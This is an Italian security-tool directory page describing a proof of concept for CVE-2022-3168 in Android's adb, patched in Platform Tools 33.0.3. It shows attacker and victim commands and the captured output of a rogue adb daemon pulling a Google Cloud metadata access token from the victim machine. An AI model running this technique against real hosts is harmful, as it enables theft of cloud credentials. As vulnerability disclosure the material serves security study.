Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-3168-adb-unexpected-reverse-forwards — Codice proof of concept per sfruttare una vulnerabilità in adb che consentiva di aprire connessioni di rete sull'host verso destinazioni arbitrarie. | Kitploit
Strumenti/GitHubGitHub/irsl/cve-2022-3168-adb-unexpected-reverse-forwards
Sicurezza AndroidAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza MobileRed Teaming
GitHubirsl/cve-2022-3168-adb-unexpected-reverse-forwards

CVE-2022-3168-adb-unexpected-reverse-forwards

Codice proof of concept per sfruttare una vulnerabilità in adb che consentiva di aprire connessioni di rete sull'host verso destinazioni arbitrarie.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
313 anni faNon ancora revisionato

La funzionalità di reverse tunnel in Android Debug Bridge (adb) era vulnerabile in quanto consentiva a daemon adb dannosi di aprire connessioni verso host/porte arbitrarie e socket di dominio unix sull'host.

Finestra dell'attaccante (dove è in esecuzione il daemon rogue):

root@kitploit:~
$ ./adb_rogue_daemon.py

Finestra della vittima (una VM GCE in questo esempio):

root@kitploit:~
$ adb connect serverip:5556
connected to 8.tcp.ngrok.io:19076

Finestra dell'attaccante:

root@kitploit:~
...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted].....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'
<<< b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
('....', (774778414, 774778414, 774778414, 774778414, 774778414), b'...........................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba')

Questo problema è stato corretto in Platform Tools 33.0.3.

Scarica lo strumento